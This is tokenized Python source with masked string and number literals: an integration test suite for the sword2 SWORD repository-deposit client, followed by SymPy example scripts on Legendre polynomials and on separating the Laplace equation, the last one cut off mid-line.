] , <EOL> ) </s>
<s> from . import TestController <EOL> from sword2 import Connection , Entry , Error_Document , Atom_Sword_Statement , Ore_Sword_Statement <EOL> from sword2 . compatible_libs import etree <EOL> PACKAGE = "<STR_LIT>" <EOL> PACKAGE_MIME = "<STR_LIT>" <EOL> SSS_URL = "<STR_LIT>" <EOL> SSS_UN = "<STR_LIT>" <EOL> SSS_PW = "<STR_LIT>" <EOL> SSS_OBO = "<STR_LIT>" <EOL> class TestConnection ( TestController ) : <EOL> def test_01_get_service_document ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> assert conn . sd != None <EOL> assert conn . sd . parsed == True <EOL> assert conn . sd . valid == True <EOL> assert len ( conn . sd . workspaces ) == <NUM_LIT:1> <EOL> def test_02_get_service_document_on_behalf_of ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> assert conn . sd != None <EOL> assert conn . sd . parsed == True <EOL> assert conn . sd . valid == True <EOL> assert len ( conn . sd . workspaces ) == <NUM_LIT:1> <EOL> def test_03_basic_create_resource_with_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> def test_04_advanced_create_resource_with_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> """<STR_LIT>""" <EOL> def test_07_basic_create_resource_with_entry ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> def test_08_advanced_create_resource_with_entry ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> def test_09_basic_retrieve_deposit_receipt ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> assert receipt . location != None <EOL> new_receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> def test_10_advanced_retrieve_deposit_receipt ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . location != None <EOL> new_receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> def test_11_basic_retrieve_content_cont_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert receipt . cont_iri is not None <EOL> resource = conn . get_resource ( content_iri = receipt . cont_iri ) <EOL> assert resource . code == <NUM_LIT:200> <EOL> assert resource . content is not None <EOL> def test_12_basic_retrieve_content_em_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert receipt . edit_media is not None <EOL> resource = conn . get_resource ( content_iri = receipt . edit_media ) <EOL> assert resource . code == <NUM_LIT:200> <EOL> assert resource . content is not None <EOL> def test_13_advanced_retrieve_content_em_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> packaging = '<STR_LIT>' <EOL> if receipt . packaging is not None and len ( receipt . packaging ) > <NUM_LIT:0> : <EOL> packaging = receipt . packaging [ <NUM_LIT:0> ] <EOL> resource = conn . get_resource ( content_iri = receipt . edit_media , packaging = packaging , on_behalf_of = SSS_OBO ) <EOL> assert resource . code == <NUM_LIT:200> <EOL> assert resource . content is not None <EOL> def test_14_error_retrieve_content_em_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> error = '<STR_LIT>' <EOL> response = conn . get_resource ( content_iri = receipt . edit_media , packaging = error ) <EOL> assert response . code == <NUM_LIT> <EOL> assert isinstance ( response , Error_Document ) <EOL> assert response . error_href == "<STR_LIT>" <EOL> def test_15_retrieve_content_em_iri_as_feed ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert receipt . edit_media_feed is not None <EOL> response = conn . get_resource ( content_iri = receipt . edit_media_feed ) <EOL> assert response . code == <NUM_LIT:200> <EOL> assert response . content is not None <EOL> dom = etree . fromstring ( response . content ) <EOL> def test_16_basic_replace_file_content ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . update ( dr = receipt , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> def test_17_advanced_replace_file_content ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . update ( dr = receipt , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> metadata_relevant = True ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> def test_18_basic_replace_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , metadata_entry = e ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> new_receipt = conn . update ( dr = receipt , metadata_entry = ne ) <EOL> assert new_receipt . code == <NUM_LIT> or new_receipt . code == <NUM_LIT:200> <EOL> if new_receipt . code == <NUM_LIT> : <EOL> assert new_receipt . dom is None <EOL> if new_receipt . code == <NUM_LIT:200> : <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> def test_19_advanced_replace_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , metadata_entry = e ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> new_receipt = conn . update ( dr = receipt , metadata_entry = ne , in_progress = True ) <EOL> assert new_receipt . code == <NUM_LIT> or new_receipt . code == <NUM_LIT:200> <EOL> if new_receipt . code == <NUM_LIT> : <EOL> assert new_receipt . dom is None <EOL> if new_receipt . code == <NUM_LIT:200> : <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> """<STR_LIT>""" <EOL> def test_22_delete_content ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> new_receipt = conn . delete_content_of_resource ( dr = receipt ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> def test_23_basic_add_content_to_resource_single_file ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , mimetype = PACKAGE_MIME ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location != receipt . edit_media <EOL> def test_24_advanced_add_content_to_resource_single_file ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , <EOL> mimetype = PACKAGE_MIME , <EOL> metadata_relevant = True ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location != receipt . edit_media <EOL> def test_25_basic_add_content_to_resource_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , <EOL> mimetype = PACKAGE_MIME , <EOL> packaging = "<STR_LIT>" ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location == receipt . edit_media <EOL> def test_26_advanced_add_content_to_resource_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , <EOL> mimetype = PACKAGE_MIME , <EOL> packaging = "<STR_LIT>" , <EOL> metadata_relevant = True ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location == receipt . edit_media <EOL> def test_27_basic_add_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e <EOL> ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" , <EOL> dcterms_creator = "<STR_LIT>" , dcterms_rights = "<STR_LIT>" ) <EOL> new_receipt = conn . append ( dr = receipt , metadata_entry = ne ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> def test_28_advanced_add_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e <EOL> ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" , <EOL> dcterms_creator = "<STR_LIT>" , dcterms_rights = "<STR_LIT>" ) <EOL> new_receipt = conn . append ( dr = receipt , metadata_entry = ne , in_progress = True ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> """<STR_LIT>""" <EOL> def test_31_delete_container ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> new_receipt = conn . delete_container ( dr = receipt ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> another_receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> def test_32_get_atom_statement ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> assert receipt . atom_statement_iri is not None <EOL> statement = conn . get_atom_sword_statement ( receipt . atom_statement_iri ) <EOL> assert isinstance ( statement , Atom_Sword_Statement ) <EOL> def test_33_get_ore_statement ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> assert receipt . ore_statement_iri is not None <EOL> statement = conn . get_ore_sword_statement ( receipt . ore_statement_iri ) <EOL> assert isinstance ( statement , Ore_Sword_Statement ) <EOL> def test_34_complete_deposit ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> edit_iri = receipt . location <EOL> receipt = conn . get_deposit_receipt ( edit_iri ) <EOL> response = conn . complete_deposit ( dr = receipt ) <EOL> assert response . code == <NUM_LIT:200> <EOL> def test_35_error_checksum_mismatch ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" , <EOL> md5sum = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert isinstance ( receipt , Error_Document ) <EOL> assert receipt . error_href == "<STR_LIT>" <EOL> def test_36_error_bad_request ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = "<STR_LIT>" , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert isinstance ( receipt , Error_Document ) <EOL> assert receipt . error_href == "<STR_LIT>" <EOL> def test_37_error_target_owner_unknown ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" , <EOL> on_behalf_of = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert isinstance ( receipt , Error_Document ) <EOL> assert receipt . error_href == "<STR_LIT>" <EOL> def test_38_error_mediation_not_allowed ( self ) : <EOL> pass <EOL> def test_39_error_method_not_allowed ( self ) : <EOL> pass <EOL> def test_40_error_max_upload_size_exceeded ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from sympy . external import import_module <EOL> np = import_module ( '<STR_LIT>' ) <EOL> if not np : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> plt = import_module ( '<STR_LIT>' ) <EOL> if not plt : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> import mpmath <EOL> from sympy . utilities . autowrap import ufuncify <EOL> from sympy . utilities . lambdify import implemented_function <EOL> from sympy import symbols , legendre , pprint <EOL> def main ( ) : <EOL> print ( __doc__ ) <EOL> x = symbols ( '<STR_LIT:x>' ) <EOL> grid = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1000> ) <EOL> mpmath . mp . dps = <NUM_LIT:20> <EOL> print ( "<STR_LIT>" ) <EOL> for n in range ( <NUM_LIT:6> ) : <EOL> expr = legendre ( n , x ) <EOL> print ( "<STR_LIT>" % n ) <EOL> pprint ( expr ) <EOL> binary_poly = ufuncify ( x , expr ) <EOL> polyvector = binary_poly ( grid ) <EOL> maxdiff = <NUM_LIT:0> <EOL> for j in range ( len ( grid ) ) : <EOL> precise_val = mpmath . legendre ( n , grid [ j ] ) <EOL> diff = abs ( polyvector [ j ] - precise_val ) <EOL> if diff > maxdiff : <EOL> maxdiff = diff <EOL> print ( "<STR_LIT>" % maxdiff ) <EOL> assert maxdiff < <NUM_LIT> <EOL> plot1 = plt . pyplot . plot ( grid , polyvector , hold = True ) <EOL> print ( "<STR_LIT>" ) <EOL> plt . pyplot . show ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from sympy import symbols , Eq , Function , pde_separate , pprint , sin , cos , latex <EOL> from sympy import Derivative as D <EOL> def main ( ) : <EOL> r , phi , theta = symbols ( "<STR_LIT>" ) <EOL> Xi = Function ( '<STR_LIT>' ) <EOL> R , Phi , Theta , u = map ( Function , [ '<STR_LIT:R>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:u>' ] ) <EOL> C1 , C2 = symbols ( '<STR_LIT>' ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( "<STR_LIT>" ) <EOL> eq = Eq ( D ( Xi ( r , phi , theta ) , r , <NUM_LIT:2> ) + <NUM_LIT:2> / r * D ( Xi ( r , phi , theta ) , r ) + <EOL> <NUM_LIT:1> / ( r ** <NUM_LIT:2> * sin ( phi ) ** <NUM_LIT:2> ) * D ( Xi ( r , phi , theta ) , theta , <NUM_LIT:2> ) + <EOL> cos ( phi ) / ( r ** <NUM_LIT:2> * sin ( phi ) ) * D ( Xi ( r , phi , theta ) , phi ) + <EOL> <NUM_LIT:1> / r ** <NUM_LIT:2> * D ( Xi ( r , phi , theta ) , phi , <NUM_LIT:2> ) ) <EOL> pprint ( eq ) <EOL> pprint ( "<STR_LIT>" ) <EOL> res_r = pde_separate 